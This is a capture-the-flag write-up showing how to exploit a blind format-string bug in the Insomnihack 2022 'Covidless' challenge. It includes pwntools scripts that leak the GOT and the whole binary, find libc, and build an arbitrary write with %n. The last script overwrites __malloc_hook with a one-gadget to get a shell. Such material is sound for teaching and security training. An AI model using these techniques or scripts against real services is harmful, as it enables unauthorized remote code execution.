Blind

It's possible to pwn a format strings vulnerable binary without even having access to the a local copy of the binary by leaking some important data.

For this example I'll use the Covidless challenge from Insomnihack teaser 2022.

Files

Format strings

The challenge only provided a port and ip for us to connect with.

Once we connect we can interact with the program remotely and a simple test reveals there is a format strings vulnerability.

Arbitrary read

With a format strings vulnerability we can make printf try to access values on the stack and either print them as pointers/(hexa)decimal numbers using %p, %x, %d, etc. Or we can try to read data from those values casting them as pointers using %s, %c, etc. The best way to leverage this to an arb read is by making it access the data in the buffer where our input is written to as pointers; that way we can make it leak the value at any given address we want. Notice that we can use %<index>$<formatter> in our payloads to select an index, so we can control which position of the stack will be accessed by the formatter.

This payload access AAAABBBB on the stack and prints it as a pointer, if we replace %p with %s it will try to access data at 0x4242424241414141 which should give us a segfault.

We can use this payload replacing AAAABBBB with valid addresses to leak any data we want. Notice that it's important that the value that we want to follow as pointer should go in the end of the payload because printf stops reading on null bytes and addresses are subject to having them. Printf also stops reading on \n, which means we cannot read data at an address that contains a 0x0a byte.

Leaking libc (quick n dirty)

Whenever we want to get the GOT offsets to leak libc addresses, we usually use a local copy of the binary to do so, but this time we don't really have one. In this case we can either leak the whole binary or make some educated guesses and make our lives easier. :)

The 0x4000000 leaks reveal that this is a 0x86-64bit ELF binary with no PIE. It's known that if a binary is partial RELRO instead of full RELRO (which we don't know for sure yet, but we will suppose it is) the GOT will be at the start of the RW section, which goes right after the rodata section which is ELF base + 0x2000000. We can use another no PIE, Partial RELRO, 0x86-64bit ELF binary to compare the offsets.

          0x400000           0x401000 r-xp     1000 0      /home/xten/Documents/ctf/htb/challenges/completed/ropme/ropme
          0x600000           0x601000 r--p     1000 0      /home/xten/Documents/ctf/htb/challenges/completed/ropme/ropme
          0x601000           0x602000 rw-p     1000 1000   /home/xten/Documents/ctf/htb/challenges/completed/ropme/ropme
          0x602000           0x623000 rw-p    21000 0      [heap]

We can start leaking at the start of 0x601000, and if our guess about the "RELROness" of this binary is right, we will likely get some libc looking addresses.

#!/usr/bin/env python2
from pwn import *

# Definitions
io = remote('covidless.insomnihack.ch',6666)

# Exploit
def pwn():
    with open('got','a') as f:
        addr = 0x601000
        while True:
            if addr >= 0x601100:
                break

            log.success(hex(addr))
            raw_addr = p64(addr)

            # Ignore \n (printf)
            if '\n' in raw_addr:
                f.write('\x00')
                addr += 1
                continue

            # Send fmt
            io.recvrepeat(0.1)
            io.sendline('%14$s###########'+raw_addr)

            # Parse
            out = io.recvuntil('###########').split('###########')[0]+'\x00'
            out = out.split('Your covid pass is invalid : ')[1]
            out = out.split('###########')[0]+'\x00'
            io.recvrepeat(0.1)

            # Append and repeat
            l = len(out)
            if l == 0:
                f.write('\x00')
                addr += 1
            else:
                print('Leak: ' + hex(u64(out.ljust(8,'\x00'))))
                f.write(out)

                addr += l
       
pwn()
io.interactive()

And the leaks doesn't look bad at all!

It's very likely that we are reading the GOT table. The offsets of entries in the GOT table are almost predictable and we can again use another binary for comparison.

If the offsets match (which is very likely), we can expect the leak at 0x601018 to be the libc address of puts (this is also not 100%, btw). We can then feed this leak to a libc database to confirm it and get the exact libc version.

We found a pretty reliable match, but before moving on, if it's not obvious already, so far we have relied on very likely but not certain guesses, and this is why we have to triage our results at each step. A pretty easy way of testing if our libc leak and version are right is to calculate the libc base and add the offset of the string /bin/sh and then use the format strings vulnerability to leak the data at this address, if the resulting string is /bin/sh we can confirm our leak and move on to exploit dev.

#!/usr/bin/env python2
from pwn import *

# Definitions
libc = ELF('./libc.so.6',checksec=False)
io = remote('covidless.insomnihack.ch',6666)

# Dummy value to initialize puts
def dummy():
    io.recvrepeat(0.3)
    io.sendline('dummy')

# Read value at address
def fmt_str_read(addr):
    io.recvrepeat(0.3)
    io.sendline('%14$s###########'+p64(addr))
    out = io.recvuntil('###########').split('###########')[0]
    out = out.split('Your covid pass is invalid : ')[1]
    out = out.split('#elev$delim')[0]
    return out

# Leak puts@got and get libc base
def leak_libc():
    libc.address = u64(fmt_str_read(0x601018).ljust(8,'\x00')) - 0x0809c0
    log.success('Libc: ' + hex(libc.address))
   
# Exploit
def pwn():
    dummy()
    leak_libc()

    if fmt_str_read(libc.address+0x1b3e9a) == '/bin/sh':
        log.success('Libc matches!')
    else:
        log.warning('Libc doesnt match!')

    # Clean junk data
    io.recvrepeat(0.3)

pwn()
io.interactive()

Running this code confirms our leak.

Leaking Libc (right way)

The method we used before is not 100% certain, so if it doesn't work at first, just dump the bin, this was meant to save time and effort, not to create even more, leaking the binary is not difficult at all, it's just time consuming. Here is some code to leak the whole binary:

#!/usr/bin/env python2
from pwn import *

# Definitions
io = remote('covidless.insomnihack.ch',6666)

# Exploit
def pwn():
    with open('elf','a') as f:
        addr = 0x400000
        while True:

            log.success(hex(addr))
            raw_addr = p64(addr)

            # Ignore \n (printf)
            if '\n' in raw_addr[:7]:
                f.write('\x00')
                addr += 1
                continue

            # Send fmt
            io.recvrepeat(0.1)
            io.sendline('%14$s###########'+raw_addr)

            # Parse
            out = io.recvuntil('###########').split('###########')[0]+'\x00'
            out = out.split('Your covid pass is invalid : ')[1]
            out = out.split('###########')[0]
            io.recvrepeat(0.1)

            # Append and repeat
            l = len(out)
            if l == 0:
                f.write('\x00')
                addr += 1
            else:
                print('Leak: ' + out)
                f.write(out)

                addr += l
     
pwn()
io.interactive()

Basically you use the arb read primitive to read from 0x400000 until it crashes with a segfault, which means you've dump the entire memory segment and started poking at unmaped memory.

The upside of leaking the whole bin is that once you dumped it you can just check the symbols and get the correct addresses without doing ANY guessing at all.

Now we can just read whatever is at 0x601018 and know that it will be the address of puts.

Arbitrary write

There is a very interesting formatter we can use to achieve arbitrary write, and that is %n. What this formatter does is that it accesses a pointer and stores the number of characters that precede the formatter in the formatted string in it. Therefore, a code that looks like this:

printf("AAAA%n", count);

Would store 4 in count, since 4 is the number of characters before %n in the formatted string. Usually this would require us to be able to write very large payloads. But we are limited to a maximum size of 107 bytes (not including the formatter and the pointer) of padding to control the byte written by %n, which would limit us to bytes in the range of 0-107. But there is a neat way to compress our payloads by combining %n with another formatter. We can use %<char><count><formatter> to add count*char + value accessed by the formatter to the formatted string without actually having to write those bytes to the original string. Heres is an example:

This prints 20 0's and the value accessed by %x, this way we can get the padding that precedes %n to be bigger than 107. This payload still has limitations though, we can't send 0 characters before %n with this method and would be limited to the range of 6-255 (6 is the size of "400934"), but if we combine the conventional payload with the compressed payload and make our exploit switch between them as needed, we can make %n return any value from 0-255, allowing us to write any byte we want at any address we want.

Final exploit

With our arb read/write primitives contructed we can use them to overwrite __malloc_hook with an onegadget and then send a formatter that will produce a very big formatted string and cause printf to call malloc.

#!/usr/bin/env python2
from pwn import *

# Definitions
libc = ELF('./libc.so.6',checksec=False)
io = remote('covidless.insomnihack.ch',6666)

# Dummy value to initialize puts
def dummy():
    io.recvrepeat(0.3)
    io.sendline('dummy')

# Read value at address
def fmt_str_read(addr):
    io.recvrepeat(0.3)
    io.sendline('%14$s###########'+p64(addr))
    out = io.recvuntil('###########').split('###########')[0]
    out = out.split('Your covid pass is invalid : ')[1]
    out = out.split('#elev$delim')[0]
    return out

# Overwrite a single byte
def fmt_str_write_byte(addr, byte):
    if byte <= 107:
        pad = 107 - byte        
        payload = 'A'*byte+'%26$n'+'A'*pad+p64(addr)
    else:
        payload = '%0'+str(byte)+'x%14$n#####'+p64(addr)

    io.recvrepeat(0.3)
    io.sendline(payload)
    io.recvrepeat(0.3)


# Overwrite data at address
def fmt_str_write(addr, value):
    for c in value:
        fmt_str_write_byte(addr, ord(c))
        addr += 1

# Leak puts@got and get libc base
def leak_libc():
    libc.address = u64(fmt_str_read(0x601018).ljust(8,'\x00')) - 0x0809c0
    log.success('Libc: ' + hex(libc.address))
   
# Exploit
def pwn():
    dummy()
    leak_libc()

    # Overwrite __malloc_hook w/ onegadget and force printf to malloc
    fmt_str_write(libc.sym['__malloc_hook'],p64(libc.address+0x4f322))
    io.sendline('%10000000c')

    # Clean junk data
    io.recvrepeat(0.3)

pwn()
io.interactive()

The purpose of this post is to demonstrate that dumping the entire binary is not always the only way (and most times not the best way), to get enough information to develop an exploit to a blind format string vulnerability and to show some easy way to build an arbitrary read/write interface out of this bugs.

Thanks, gabrielbezerra and R3tr074, for solving this challenge with me :D

Last updated